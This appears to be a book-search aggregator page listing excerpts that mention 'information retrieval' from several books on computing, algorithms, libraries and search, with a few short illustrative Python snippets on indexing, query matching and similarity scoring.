Steve Jobs, stochastic process, Thomas Bayes, Thomas Malthus, traveling salesman, Turing machine, urban planning, Vickrey auction, Vilfredo Pareto, Walter Mischel, Y Combinator, zero-sum game

the information retrieval systems of university libraries: Anderson’s findings on human memory are published in Anderson and Milson, “Human Memory,” and in the book The Adaptive Character of Thought. This book has been influential for laying out a strategy for analyzing everyday cognition in terms of ideal solutions, used by Tom and many others in their research. Anderson and Milson, “Human Memory,” in turn, draws from a statistical study of library borrowing that appears in Burrell, “A Simple Stochastic Model for Library Loans.” the missing piece in the study of the mind: Anderson’s initial exploration of connections between information retrieval by computers and the organization of human memory was conducted in an era when most people had never interacted with an information retrieval system, and the systems in use were quite primitive.

In 1987, Carnegie Mellon psychologist and computer scientist John Anderson found himself reading about the information retrieval systems of university libraries. Anderson’s goal—or so he thought—was to write about how the design of those systems could be informed by the study of human memory. Instead, the opposite happened: he realized that information science could provide the missing piece in the study of the mind. “For a long time,” says Anderson, “I had felt that there was something missing in the existing theories of human memory, including my own. Basically, all of these theories characterize memory as an arbitrary and non-optimal configuration.… I had long felt that the basic memory processes were quite adaptive and perhaps even optimal; however, I had never been able to see a framework in which to make this point. In the computer science work on information retrieval, I saw that framework laid out before me.”

“Some things that might seem frustrating as we grow older (like remembering names!) are a function of the amount of stuff we have to sift through … and are not necessarily a sign of a failing mind.” As he puts it, “A lot of what is currently called decline is simply learning.” Caching gives us the language to understand what’s happening. We say “brain fart” when we should really say “cache miss.” The disproportionate occasional lags in information retrieval are a reminder of just how much we benefit the rest of the time by having what we need at the front of our minds. So as you age, and begin to experience these sporadic latencies, take heart: the length of a delay is partly an indicator of the extent of your experience. The effort of retrieval is a testament to how much you know. And the rarity of those lags is a testament to how well you’ve arranged it: keeping the most important things closest to hand. 5 Scheduling First Things First How we spend our days is, of course, how we spend our lives.


pages: 250 words: 73,574

Nine Algorithms That Changed the Future: The Ingenious Ideas That Drive Today's Computers by John MacCormick, Chris Bishop

Ada Lovelace, AltaVista, Claude Shannon: information theory, fault tolerance, information retrieval, Menlo Park, PageRank, pattern recognition, Richard Feynman, Silicon Valley, Simon Singh, sorting algorithm, speech recognition, Stephen Hawking, Steve Jobs, Steve Wozniak, traveling salesman, Turing machine, Turing test, Vannevar Bush

To summarize: although humans don't use NEAR queries much, search engines use the information about nearness constantly to improve their rankings—and the reason they can do this efficiently is because they use the word-location trick. An example set of web pages that each have a title and a body. We already know that the Babylonians were using indexing 5000 years before search engines existed. It turns out that search engines did not invent the word-location trick either: this is a well-known technique that was used in other types of information retrieval before the internet arrived on the scene. However, in the next section we will learn about a new trick that does appear to have been invented by search engine designers: the metaword trick. The cunning use of this trick and various related ideas helped to catapult the AltaVista search engine to the top of the search industry in the late 1990s. THE METAWORD TRICK So far, we've been using extremely simple examples of web pages.
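The word-location trick described above can be sketched as a positional inverted index: for every word, the index stores not just which pages contain it but where. A NEAR query then reduces to comparing stored positions, with no rescanning of the pages. This is a minimal Python illustration; the sample pages and the proximity threshold are invented for the example.

```python
# A positional inverted index: map each word to (page_id, position)
# pairs, so proximity ("NEAR") queries can be answered from the index
# alone, without rereading the documents.

from collections import defaultdict

def build_index(pages):
    index = defaultdict(list)
    for page_id, text in pages.items():
        for pos, word in enumerate(text.lower().split()):
            index[word].append((page_id, pos))
    return index

def near(index, w1, w2, max_gap):
    """Pages where w1 and w2 occur within max_gap words of each other."""
    positions2 = defaultdict(list)
    for page, pos in index.get(w2, []):
        positions2[page].append(pos)
    hits = set()
    for page, pos in index.get(w1, []):
        if any(abs(pos - p) <= max_gap for p in positions2[page]):
            hits.add(page)
    return hits

pages = {
    1: "the cat sat on the mat",
    2: "the mat was here and the cat was there",
}
index = build_index(pages)
print(sorted(near(index, "cat", "mat", max_gap=4)))  # [1]
```

On page 1 the words are four positions apart, so it qualifies at `max_gap=4`; on page 2 they are five apart, so it does not. Widening the threshold admits page 2 as well, which is exactly the knob a ranking function can turn.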

Public key cryptography and the related digital signature algorithms are examples of this. In other cases, the algorithms may have existed in the research community for some time, waiting in the wings for the right wave of new technology to give them wide applicability. The search algorithms for indexing and ranking fall into this category: similar algorithms had existed for years in the field known as information retrieval, but it took the phenomenon of web search to make these algorithms “great,” in the sense of daily use by ordinary computer users. Of course, the algorithms also evolved for their new application; PageRank is a good example of this. Note that the emergence of new technology does not necessarily lead to new algorithms. Consider the phenomenal growth of laptop computers over the 1980s and 1990s.

Among the many college-level computer science texts on algorithms, three particularly readable options are Algorithms, by Dasgupta, Papadimitriou, and Vazirani; Algorithmics: The Spirit of Computing, by Harel and Feldman; and Introduction to Algorithms, by Cormen, Leiserson, Rivest, and Stein. Search engine indexing (chapter 2). The original AltaVista patent covering the metaword trick is U.S. patent 6105019, “Constrained Searching of an Index,” by Mike Burrows (2000). For readers with a computer science background, Search Engines: Information Retrieval in Practice, by Croft, Metzler, and Strohman, is a good option for learning more about indexing and many other aspects of search engines. PageRank (chapter 3). The opening quotation by Larry Page is taken from an interview by Ben Elgin, published in Businessweek, May 3, 2004. Vannevar Bush's “As We May Think” was, as mentioned above, originally published in The Atlantic magazine (July 1945).


pages: 397 words: 102,910

The Idealist: Aaron Swartz and the Rise of Free Culture on the Internet by Justin Peters

4chan, activist lawyer, Any sufficiently advanced technology is indistinguishable from magic, Bayesian statistics, Brewster Kahle, buy low sell high, crowdsourcing, disintermediation, don't be evil, global village, Hacker Ethic, hypertext link, index card, informal economy, information retrieval, Internet Archive, invention of movable type, invention of writing, Isaac Newton, John Markoff, Joi Ito, Lean Startup, moral panic, Paul Buchheit, Paul Graham, profit motive, RAND corporation, Republic of Letters, Richard Stallman, selection bias, semantic web, Silicon Valley, social web, Steve Jobs, Steven Levy, Stewart Brand, strikebreaker, Vannevar Bush, Whole Earth Catalog, Y Combinator

His brief remarks to the group at Woods Hole were wistful: “I merely wish I were young enough to participate with you in the fascinating intricacies you will encounter and bring under your control.”48 Vannevar rhymes with believer, and when it came to government funding of scientific research, Bush certainly was. He was also a lifelong believer in libraries, and the benefits to be derived from their automation. In 1945, he published an article in the Atlantic Monthly that proposed a rudimentary mechanized library called Memex, a linked-information retrieval system. Memex was a desk-size machine that was equal parts stenographer, filing cabinet, and reference librarian: “a device in which an individual stores his books, records, and communications, and which is mechanized so that it may be consulted with exceeding speed and flexibility.”49 The goal was to build a machine that could capture a user’s thought patterns, compile and organize his reading material and correspondence, and record the resulting “associative trails” between them all, such that the user could trace his end insights back to conception.

The Chicago Tribune opined, “The school mimeograph should be viewed not as a piratical rival to the trade publisher but as a helpful unpaid publicity agent who helps publishers’ long-term sales.”59 That argument didn’t take root. The rise of photoduplication technologies that facilitated the rapid spread of information merely underscored the fragility of copyright holders’ claims that intellectual property was indistinguishable from regular physical property. “We know that volumes of information can be stored on microfilm and magnetic tape. We keep hearing about information-retrieval networks,” former senator Kenneth B. Keating told Congress in 1965. “The inexorable question arises—what will happen in the long run if authors’ income is cut down and down by increasing free uses by photocopy and information storage and retrieval? Will the authors continue writing? Will the publishers continue publishing if their markets are diluted, eroded, and eventually, the profit motive and incentive completely destroyed?

Though he took a moment to celebrate what he deemed “the pinnacle of my career,” he couldn’t help but predict that future milestones would likely be few and far between, unless the American reading public took control of its nation’s copyright laws. Project Gutenberg had become an eloquent counterargument to copyright advocates’ dismissive claims about the public domain. It demonstrated just how easily a network could be used to breathe new life into classics that might otherwise go unseen. Despite the existence of initiatives such as Project Gutenberg, despite the emergence of the Internet as a new medium for information retrieval and distribution, the same official attitudes about intellectual property prevailed. The public domain was regarded as a penalty rather than as an opportunity. Parochial concerns were conflated with the public interest. The rise of the Internet might portend an informational revolution, but from the standpoint of the people in power, Hart warned, revolution was a bad thing. “Every single time a new publishing technique has promised to get the common people a home library, laws have been passed to stop, dead in its tracks, this kind of ‘Information Age,’ ” Hart wrote.


pages: 1,387 words: 202,295

Structure and Interpretation of Computer Programs, Second Edition by Harold Abelson, Gerald Jay Sussman, Julie Sussman

Andrew Wiles, conceptual framework, Donald Knuth, Douglas Hofstadter, Eratosthenes, Gödel, Escher, Bach, industrial robot, information retrieval, iterative process, Johannes Kepler, loose coupling, probability theory / Blaise Pascal / Pierre de Fermat, Richard Stallman, Turing machine, wikimedia commons

What is the order of growth in the number of steps required by list->tree to convert a list of elements? Exercise 2.65: Use the results of Exercise 2.63 and Exercise 2.64 to give implementations of union-set and intersection-set for sets implemented as (balanced) binary trees.107 Sets and information retrieval We have examined options for using lists to represent sets and have seen how the choice of representation for a data object can have a large impact on the performance of the programs that use the data. Another reason for concentrating on sets is that the techniques discussed here appear again and again in applications involving information retrieval. Consider a data base containing a large number of individual records, such as the personnel files for a company or the transactions in an accounting system. A typical data-management system spends a large amount of time accessing or modifying the data in the records and therefore requires an efficient method for accessing records.

In particular, there will be an “eval” part that classifies expressions according to type and an “apply” part that implements the language’s abstraction mechanism (procedures in the case of Lisp, and rules in the case of logic programming). Also, a central role is played in the implementation by a frame data structure, which determines the correspondence between symbols and their associated values. One additional interesting aspect of our query-language implementation is that we make substantial use of streams, which were introduced in Chapter 3. 4.4.1Deductive Information Retrieval Logic programming excels in providing interfaces to data bases for information retrieval. The query language we shall implement in this chapter is designed to be used in this way. In order to illustrate what the query system does, we will show how it can be used to manage the data base of personnel records for Microshaft, a thriving high-technology company in the Boston area. The language provides pattern-directed access to personnel information and can also take advantage of general rules in order to make logical deductions.
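The pattern-directed access the passage describes can be sketched with a toy matcher over assertion tuples. This is a Python sketch, not SICP's actual Scheme query system: the `?`-prefixed variable convention is borrowed from the book, while the tuple representation and sample records are invented for illustration.

```python
# Toy pattern-directed retrieval: assertions are tuples of strings, and
# query patterns may contain variables (strings starting with "?").
# A query returns one binding dictionary per matching assertion.

def match(pattern, assertion, bindings):
    if len(pattern) != len(assertion):
        return None
    env = dict(bindings)
    for p, a in zip(pattern, assertion):
        if p.startswith("?"):
            if p in env and env[p] != a:
                return None  # variable already bound to something else
            env[p] = a
        elif p != a:
            return None  # constant parts must agree exactly
    return env

def query(pattern, database):
    return [env for a in database
            if (env := match(pattern, a, {})) is not None]

# Hypothetical personnel assertions in the spirit of the Microshaft example.
database = [
    ("job", "Bitdiddle Ben", "computer wizard"),
    ("job", "Hacker Alyssa P", "computer programmer"),
    ("job", "Fect Cy D", "computer programmer"),
    ("supervisor", "Hacker Alyssa P", "Bitdiddle Ben"),
]

for env in query(("job", "?who", "computer programmer"), database):
    print(env["?who"])
# Hacker Alyssa P
# Fect Cy D
```

The full query language layers rules and unification on top of this kind of matching, so that logical deductions, not just stored assertions, can answer a query.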

2.1.4 Extended Exercise: Interval Arithmetic 2.2 Hierarchical Data and the Closure Property 2.2.1 Representing Sequences 2.2.2 Hierarchical Structures 2.2.3 Sequences as Conventional Interfaces 2.2.4 Example: A Picture Language 2.3 Symbolic Data 2.3.1 Quotation 2.3.2 Example: Symbolic Differentiation 2.3.3 Example: Representing Sets 2.3.4 Example: Huffman Encoding Trees 2.4 Multiple Representations for Abstract Data 2.4.1 Representations for Complex Numbers 2.4.2 Tagged data 2.4.3 Data-Directed Programming and Additivity 2.5 Systems with Generic Operations 2.5.1 Generic Arithmetic Operations 2.5.2 Combining Data of Different Types 2.5.3 Example: Symbolic Algebra 3 Modularity, Objects, and State 3.1 Assignment and Local State 3.1.1 Local State Variables 3.1.2 The Benefits of Introducing Assignment 3.1.3 The Costs of Introducing Assignment 3.2 The Environment Model of Evaluation 3.2.1 The Rules for Evaluation 3.2.2 Applying Simple Procedures 3.2.3 Frames as the Repository of Local State 3.2.4 Internal Definitions 3.3 Modeling with Mutable Data 3.3.1 Mutable List Structure 3.3.2 Representing Queues 3.3.3 Representing Tables 3.3.4 A Simulator for Digital Circuits 3.3.5 Propagation of Constraints 3.4 Concurrency: Time Is of the Essence 3.4.1 The Nature of Time in Concurrent Systems 3.4.2 Mechanisms for Controlling Concurrency 3.5 Streams 3.5.1 Streams Are Delayed Lists 3.5.2 Infinite Streams 3.5.3 Exploiting the Stream Paradigm 3.5.4 Streams and Delayed Evaluation 3.5.5 Modularity of Functional Programs and Modularity of Objects 4 Metalinguistic Abstraction 4.1 The Metacircular Evaluator 4.1.1 The Core of the Evaluator 4.1.2 Representing Expressions 4.1.3 Evaluator Data Structures 4.1.4 Running the Evaluator as a Program 4.1.5 Data as Programs 4.1.6 Internal Definitions 4.1.7 Separating Syntactic Analysis from Execution 4.2 Variations on a Scheme — Lazy Evaluation 4.2.1 Normal Order and Applicative Order 4.2.2 An Interpreter with Lazy Evaluation 4.2.3 Streams as Lazy 
Lists 4.3 Variations on a Scheme — Nondeterministic Computing 4.3.1 Amb and Search 4.3.2 Examples of Nondeterministic Programs 4.3.3 Implementing the Amb Evaluator 4.4 Logic Programming 4.4.1 Deductive Information Retrieval 4.4.2 How the Query System Works 4.4.3 Is Logic Programming Mathematical Logic? 4.4.4 Implementing the Query System 4.4.4.1 The Driver Loop and Instantiation 4.4.4.2 The Evaluator 4.4.4.3 Finding Assertions by Pattern Matching 4.4.4.4 Rules and Unification 4.4.4.5 Maintaining the Data Base 4.4.4.6 Stream Operations 4.4.4.7 Query Syntax Procedures 4.4.4.8 Frames and Bindings 5 Computing with Register Machines 5.1 Designing Register Machines 5.1.1 A Language for Describing Register Machines 5.1.2 Abstraction in Machine Design 5.1.3 Subroutines 5.1.4 Using a Stack to Implement Recursion 5.1.5 Instruction Summary 5.2 A Register-Machine Simulator 5.2.1 The Machine Model 5.2.2 The Assembler 5.2.3 Generating Execution Procedures for Instructions 5.2.4 Monitoring Machine Performance 5.3 Storage Allocation and Garbage Collection 5.3.1 Memory as Vectors 5.3.2 Maintaining the Illusion of Infinite Memory 5.4 The Explicit-Control Evaluator 5.4.1 The Core of the Explicit-Control Evaluator 5.4.2 Sequence Evaluation and Tail Recursion 5.4.3 Conditionals, Assignments, and Definitions 5.4.4 Running the Evaluator 5.5 Compilation 5.5.1 Structure of the Compiler 5.5.2 Compiling Expressions 5.5.3 Compiling Combinations 5.5.4 Combining Instruction Sequences 5.5.5 An Example of Compiled Code 5.5.6 Lexical Addressing 5.5.7 Interfacing Compiled Code to the Evaluator References List of Exercises List of Figures Term Index Colophon Unofficial Texinfo Format This is the second edition SICP book, from Unofficial Texinfo Format.


The Card Catalog: Books, Cards, and Literary Treasures by Library Of Congress, Carla Hayden

In Cold Blood by Truman Capote, index card, information retrieval, Johannes Kepler, late fees

By the 1950s, as the main card catalog at the Library of Congress surged to more than nine million cards crammed into 10,500 trays, the administration kept a watchful eye on nascent computer technology as a possible solution to the looming catalog crisis. About the same time, the handful of computer companies that existed were making major innovations and had moved away from the punched-card system, advancing to vacuum tubes and magnetic tapes. Seeing new possibilities for cataloging and storing data, Librarian of Congress Lawrence Quincy Mumford established the Committee on Mechanized Information Retrieval in January 1958. In the years that followed, and with the approval of Congress, the Library purchased an IBM 1401, a small-scale computer system the size of a Volkswagen bus. The committee also recommended establishing a group to both design and implement the procedures required to automate the catalog. Unfortunately, there were few computer programmers around. The early ones were usually mathematicians, including one Henriette D.

., 154 Borges, Jorge Luis, 9 borrowers ledgers, 52 Boston Athenaeum, 82, 107 Boston Public Library, 107, 147 Bowker, Richard Rogers, 87 Burch, Samuel, 48 C Cadell and Davies, 47 Caesar, Julius, 15 Callimachus, 14 Cataloging Distribution Service Division, 112, 146, 147 Catholic Church. See Roman Catholic Church census, 151 Centennial International Exhibition of 1876, 84 Ch’eng Ti, 15 Chicago Public Library, 7 Christianity, rise of, 15 clay, 12 Clemens, Samuel, 121 codex, 17 Cole, John, 87, 107 Collins, Billy, 156 Collyer, Homer, 148 Collyer, Langley, 148 Committee on Mechanized Information Retrieval, 152 computer punch cards, 151 Computing-Tabulating-Recording Company, 151 Congress Main Reading Room, 159 Copyright Act of 1870, 103 cross-referencing, 17 cuneiform, 12 Cutter, Charles Ammi, 82, 83, 108 D Dana, John, 146 Descartes, René, 19 Dewey Decimal Classification, 84 Dewey, Melville Louis, 82, 83, 85, 87, 107, 113, 151 Diderot, Denis, 33 Dixson, Kathy, 155 Douglass, Frederick, 102 Dove, Rita, 156 E Edlund, Paul, 112, 158 Eliot, T.


pages: 402 words: 110,972

Nerds on Wall Street: Math, Machines and Wired Markets by David J. Leinweber

AI winter, algorithmic trading, asset allocation, banking crisis, barriers to entry, Big bang: deregulation of the City of London, business cycle, butter production in bangladesh, butterfly effect, buttonwood tree, buy and hold, buy low sell high, capital asset pricing model, citizen journalism, collateralized debt obligation, corporate governance, Craig Reynolds: boids flock, creative destruction, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, Danny Hillis, demand response, disintermediation, distributed generation, diversification, diversified portfolio, Emanuel Derman, en.wikipedia.org, experimental economics, financial innovation, fixed income, Gordon Gekko, implied volatility, index arbitrage, index fund, information retrieval, intangible asset, Internet Archive, John Nash: game theory, Kenneth Arrow, load shedding, Long Term Capital Management, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, market fragmentation, market microstructure, Mars Rover, Metcalfe’s law, moral hazard, mutually assured destruction, Myron Scholes, natural language processing, negative equity, Network effects, optical character recognition, paper trading, passive investing, pez dispenser, phenotype, prediction markets, quantitative hedge fund, quantitative trading / quantitative finance, QWERTY keyboard, RAND corporation, random walk, Ray Kurzweil, Renaissance Technologies, risk tolerance, risk-adjusted returns, risk/return, Robert Metcalfe, Ronald Reagan, Rubik’s Cube, semantic web, Sharpe ratio, short selling, Silicon Valley, Small Order Execution System, smart grid, smart meter, social web, South Sea Bubble, statistical arbitrage, statistical model, Steve Jobs, Steven Levy, Tacoma Narrows Bridge, the scientific method, The Wisdom of Crowds, time value of money, too big to fail, transaction costs, Turing machine, Upton Sinclair, value at risk, Vernor Vinge, yield curve, Yogi Berra, your tax 
dollars at work

Reporters were necessary intermediaries in an era when (for example) press releases were sent to a few thousand fax machines and assigned to reporters by editors, and when SEC filings were found on a shelf in the Commission’s reading rooms in major cities. Press releases go to everyone over the Web. SEC filings are completely electronic. The reading rooms are closed. There is a great deal of effort to develop persistent specialized information-retrieval software agents for these sorts of routine newsgathering activities, which in turn creates incentives for reporters to move up from moving information around to interpretation and analysis. Examples and more in-depth discussion on these “new research” topics are forthcoming in Chapters 9 and 10. Innovative algo systems will facilitate the use of news, in processed and raw forms.

Dow Jones Elementized News Feed, www.djnewswires.com/us/djenf.htm. 26. Reuters Newscope algorithmic offerings, http://about.reuters.com/productinfo/newsscoperealtime/index.aspx?user=1&. 27. These tools are called Open Calais (www.opencalais.com/). 28. For the technically ambitious reader, Lucene (http://lucene.apache.org/), Lingpipe (http://alias-i.com/lingpipe/), and Lemur (www.lemurproject.org/) are popular open source language and information retrieval tools. 29. Anthony Oettinger, a pioneer in machine translation at Harvard going back to the 1950s, told a story of an early English-Russian-English system sponsored by U.S. intelligence agencies. The English “The spirit is willing but the flesh is weak” went in, was translated to Russian, which was then sent in again to be translated back into English. The result: “The vodka is ready but the meat is rotten.”

Direct market access has disintermediated brokers, many of whom are now in other lines of work. Direct access to primary sources of financially relevant information is disintermediating reporters, who now have to provide more than just a conduit to earn their keep. We would be hard-pressed to find more innovation than we see today on the Web. Google Finance, Yahoo! Finance, and their brethren have made more advanced information retrieval and analysis tools available for free than could be purchased for any amount in the not-so-distant past. Other new technologies enable a new level of human-machine collaboration in investment research, such as XML (extensible markup language), discussed in Chapter 2. One of this technology’s most vocal proponents is Christopher Cox, former chairman of the SEC, who has taken the lead in encouraging the adoption of XBRL (extensible Business Reporting Language) to keep U.S. markets, exchanges, companies, and investors ahead of the curve. We constantly hear about information overload, information glut, information anxiety, data smog, and the like.


pages: 223 words: 52,808

Intertwingled: The Work and Influence of Ted Nelson (History of Computing) by Douglas R. Dechow

3D printing, Apple II, Bill Duvall, Brewster Kahle, Buckminster Fuller, Claude Shannon: information theory, cognitive dissonance, computer age, conceptual framework, Douglas Engelbart, Douglas Engelbart, Dynabook, Edward Snowden, game design, HyperCard, hypertext link, information retrieval, Internet Archive, Jaron Lanier, knowledge worker, linked data, Marc Andreessen, Marshall McLuhan, Menlo Park, Mother of all demos, pre–internet, RAND corporation, semantic web, Silicon Valley, software studies, Steve Jobs, Steve Wozniak, Stewart Brand, Ted Nelson, the medium is the message, Vannevar Bush, Wall-E, Whole Earth Catalog

Childress V (1998) Engineering problem solving for mathematics, science, and technology education. J Technol Educ 10(1). http://scholar.lib.vt.edu/ejournals/JTE/v10n1/childress.html 5. Nelson TH (1965) A file structure for the complex, the changing and the indeterminate. In: Proceedings of the ACM 20th national conference. ACM Press, New York, pp 84–100 6. Nelson TH (1967) Getting it out of our system. In: Schechter G (ed) Information retrieval: a critical review. Thompson Books, Washington, DC, pp 191–210 7. Nelson TH (1968) Hypertext implementation notes, 6–10 March 1968. Xuarchives. http://xanadu.com/REF%20XUarchive%20SET%2003.11.06/hin68.tif 8. Nelson TH (1974) Computer lib: you can and must understand computers now/dream machines. Hugo’s Book Service, Chicago 9. Nelson TH (1993) Literary machines. Mindful Press, Sausalito 10.

Ted signed my copy of Literary Machines [25] at a talk in the mid-1990s, thus I was in awe of the man when Bill Dutton put us together as visiting scholars in the OII attic, a wonderful space overlooking the Ashmolean Museum. Ted and I arrived at concepts of data and metadata from very different paths. He brought his schooling in the theater and literary theory to the pioneer days of personal computing. I brought my schooling in mathematics, information retrieval, documentation, libraries, and communication to the study of scholarship. While Ted was sketching personal computers to revolutionize written communication [24], I was learning how to pry data out of card catalogs and move them into the first generation of online catalogs [6]. Our discussions that began 30 years later revealed the interaction of these threads, which have since converged. 10.2 Collecting and Organizing Data Ted overwhelms himself in data, hence he needs metadata to manage his collections.

Paper presented to Sixth National Symposium on Information Display, Los Angeles, pp 31–39 *Nelson TH (1965) The hypertext. In: Proceedings of the World Documentation Federation Nelson TH (1966–1967) Hypertext notes. http://web.archive.org/web/20031127035740/http://www.xanadu.com/XUarchive/. Unpublished series of ten short essays or “notes” Nelson TH (1967) Getting it out of our system. In: Schechter G (ed) Information retrieval: a critical review. Thompson Books, Washington, DC, pp 191–210 Nelson TH, Carmody S, Gross W, Rice D, van Dam A (1969) A hypertext editing system for the /360. In: Faiman M, Nievergelt J (eds) Pertinent concepts in computer graphics. Proceedings of the Second University of Illinois conference on computer graphics. University of Illinois Press, Urbana, pp 291–330 Nelson TH (1970) Las Vegas confrontation sit-out: a CAI radical’s view from solitary.


pages: 371 words: 93,570

Broad Band: The Untold Story of the Women Who Made the Internet by Claire L. Evans

"side hustle", 4chan, Ada Lovelace, Albert Einstein, British Empire, colonial rule, computer age, crowdsourcing, dark matter, dematerialisation, Doomsday Book, Douglas Engelbart, Douglas Engelbart, Douglas Hofstadter, East Village, Edward Charles Pickering, game design, glass ceiling, Grace Hopper, Gödel, Escher, Bach, Haight Ashbury, Harvard Computers: women astronomers, Honoré de Balzac, Howard Rheingold, HyperCard, hypertext link, index card, information retrieval, Internet Archive, Jacquard loom, John von Neumann, Joseph-Marie Jacquard, knowledge worker, Leonard Kleinrock, Mahatma Gandhi, Mark Zuckerberg, Menlo Park, Mother of all demos, Network effects, old-boy network, On the Economy of Machinery and Manufactures, packet switching, pets.com, rent control, RFC: Request For Comment, rolodex, semantic web, Silicon Valley, Skype, South of Market, San Francisco, Steve Jobs, Steven Levy, Stewart Brand, subscription business, technoutopianism, Ted Nelson, telepresence, Whole Earth Catalog, Whole Earth Review, women in the workforce, Works Progress Administration, Y2K

With a couple of phones and boxes of index cards, it coordinated extensive group action for quick-response incidents like the 1971 San Francisco Bay oil spill—an early version of the kind of organizing that happens so easily today on social media. Resource One took up where these efforts left off, even inheriting the San Francisco Switchboard’s corporate shell. When Pam and the Chrises moved into the warehouse, their plan was to design a common information retrieval system for all the existing Switchboards in the city, interlinking their various resources into a database running on borrowed computer time. “Our vision was making technology accessible to people,” Pam explains. “It was a very passionate time. And we thought anything was possible.” But borrowing computer time to build such a database was far too limiting; if they were to imbue their politics into a computer system for the people, they’d need to build it from the ground up.

That summer, while the other communards plumbed the building’s twenty-foot hot tub, the Resource One group installed cabinet racks and drum storage units. Nobody on the job had done anything remotely like it—even the lead electrician learned as he went, and the software was written from scratch, encoding the counterculture’s values into the computer at an operating system level. The Resource One Generalized Information Retrieval System, ROGIRS, written by a hacker, Ephrem Lipkin, was designed for the underground Switchboards, as a way to manage the offerings of an alternative economy. Once up and running, the machine would become the heart of Northern California’s underground free-access network, a glimmer of the Internet’s vital cultural importance years before most people would ever hear of it. “At different points in your life, different things matter,” Pam says to me.

Bolton told them how social services agencies in the Bay Area didn’t share a citywide database for referral information; he’d personally observed how social workers at different agencies relied on their own Rolodexes. The quality of referrals they gave varied throughout the city, and people weren’t always connected to the services they needed, even if the services did exist. Chris Macie, who founded Resource One with Pam and stayed on after she left, programmed a new information retrieval system for the project, and the women started calling social workers all over San Francisco. If they kept an updated database of referral information, they asked, would the agencies be interested in subscribing? The answer was a resounding yes. The women of Resource One found their cause: using the computer to help the most disadvantaged people in the city gain access to services. Their Social Services Referral Directory succeeded where efforts to interlink Bay Area Switchboards had failed, and for a simple reason: it actually considered its users.


pages: 480 words: 99,288

Mastering ElasticSearch by Rafal Kuc, Marek Rogozinski

Amazon Web Services, create, read, update, delete, en.wikipedia.org, fault tolerance, finite state, full text search, information retrieval

Keep in mind that, in order to adjust your query relevance, you don't need to understand this, but it is very important to at least know how it works. The Lucene conceptual formula The conceptual version of the TF/IDF formula looks like: The formula presented above is a representation of the Boolean model of Information Retrieval combined with the Vector Space Model of Information Retrieval. Let's not discuss it; let's jump straight to the practical formula, which is implemented by Apache Lucene and is actually used. Note The information about the Boolean model and Vector Space Model of Information Retrieval is far beyond the scope of this book. If you would like to read more about them, start with http://en.wikipedia.org/wiki/Standard_Boolean_model and http://en.wikipedia.org/wiki/Vector_Space_Model. The Lucene practical formula Now let's look at the practical formula Apache Lucene uses: As you can see, the score factor for the document is a function of query q and document d.
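The conceptual combination of term frequency and inverse document frequency described above can be sketched in a few lines of Python. This is an illustration of the general TF/IDF idea only, not Lucene's actual scoring code, and the tiny corpus and query here are invented for the example:

```python
import math

def tf_idf_score(query_terms, doc, corpus):
    """Conceptual TF/IDF score: sum over query terms of tf(t, d) * idf(t)."""
    n_docs = len(corpus)
    score = 0.0
    for term in query_terms:
        tf = doc.count(term)                      # raw term frequency in the document
        df = sum(1 for d in corpus if term in d)  # number of documents containing the term
        idf = math.log(n_docs / df) if df else 0.0
        score += tf * idf
    return score

corpus = [
    ["information", "retrieval", "systems"],
    ["vector", "space", "model"],
    ["boolean", "model", "of", "information", "retrieval"],
]
# A document matching rarer query terms gets a higher score.
print(tf_idf_score(["vector", "space"], corpus[1], corpus))
```

The idf factor is what makes a match on "vector" (one document) count for more than a match on "model" (two documents); Lucene's practical formula adds further factors such as field norms and boosts on top of this core.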

He is also a speaker for various conferences around the world such as Lucene Eurocon, Berlin Buzzwords, ApacheCon, and Lucene Revolution. Rafał began his journey with Lucene in 2002 and it wasn't love at first sight. When he came back to Lucene in late 2003, he revised his thoughts about the framework and saw the potential in search technologies. Then Solr came and this was it. He started working with ElasticSearch in the middle of 2010. Currently, Lucene, Solr, ElasticSearch, and information retrieval are his main points of interest. Rafał is also an author of Solr 3.1 Cookbook, the update to it—Solr 4.0 Cookbook, and is a co-author of ElasticSearch Server all published by Packt Publishing. The book you are holding in your hands was something that I wanted to write after finishing the ElasticSearch Server book and I got the opportunity. I wanted not to jump from topic to topic, but concentrate on a few of them and write about what I know and share the knowledge.


pages: 660 words: 141,595

Data Science for Business: What You Need to Know About Data Mining and Data-Analytic Thinking by Foster Provost, Tom Fawcett

Albert Einstein, Amazon Mechanical Turk, big data - Walmart - Pop Tarts, bioinformatics, business process, call centre, chief data officer, Claude Shannon: information theory, computer vision, conceptual framework, correlation does not imply causation, crowdsourcing, data acquisition, David Brooks, en.wikipedia.org, Erik Brynjolfsson, Gini coefficient, information retrieval, intangible asset, iterative process, Johann Wolfgang von Goethe, Louis Pasteur, Menlo Park, Nate Silver, Netflix Prize, new economy, p-value, pattern recognition, placebo effect, price discrimination, recommendation engine, Ronald Coase, selection bias, Silicon Valley, Skype, speech recognition, Steve Jobs, supply-chain management, text mining, The Signal and the Noise by Nate Silver, Thomas Bayes, transaction costs, WikiLeaks

It may be used directly to find customers similar to a given customer. It forms the core of several prediction algorithms that estimate a target value such as the expected resource usage of a client or the probability that a customer will respond to an offer. It is also the basis for clustering techniques, which group entities by their shared features without a focused objective. Similarity forms the basis of information retrieval, in which documents or webpages relevant to a search query are retrieved. Finally, it underlies several common algorithms for recommendation. A traditional algorithm-oriented book might present each of these tasks in a different chapter, under different names, with common aspects buried in algorithm details or mathematical propositions. In this book we instead focus on the unifying concepts, presenting specific tasks and algorithms as natural manifestations of them.

In set notation, the Jaccard distance metric is shown in Equation 6-4. Equation 6-4. Jaccard distance Cosine distance is often used in text classification to measure the similarity of two documents. It is defined in Equation 6-5. Equation 6-5. Cosine distance where ||·||2 again represents the L2 norm, or Euclidean length, of each feature vector (for a vector this is simply the distance from the origin). Note The information retrieval literature more commonly talks about cosine similarity, which is simply the fraction in Equation 6-5. Alternatively, it is 1 – cosine distance. In text classification, each word or token corresponds to a dimension, and the location of a document along each dimension is the number of occurrences of the word in that document. For example, suppose document A contains seven occurrences of the word performance, three occurrences of transition, and two occurrences of monetary.
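Both measures just described are compact enough to write out directly. A minimal Python sketch: document A's word counts come from the text above, while document B's counts are invented for illustration:

```python
import math

def cosine_similarity(a, b):
    """Cosine similarity of two term-count vectors (dicts of word -> count)."""
    terms = set(a) | set(b)
    dot = sum(a.get(t, 0) * b.get(t, 0) for t in terms)
    norm_a = math.sqrt(sum(v * v for v in a.values()))  # L2 norm ||a||2
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b)

def jaccard_distance(a, b):
    """Jaccard distance between two sets: 1 - |intersection| / |union|."""
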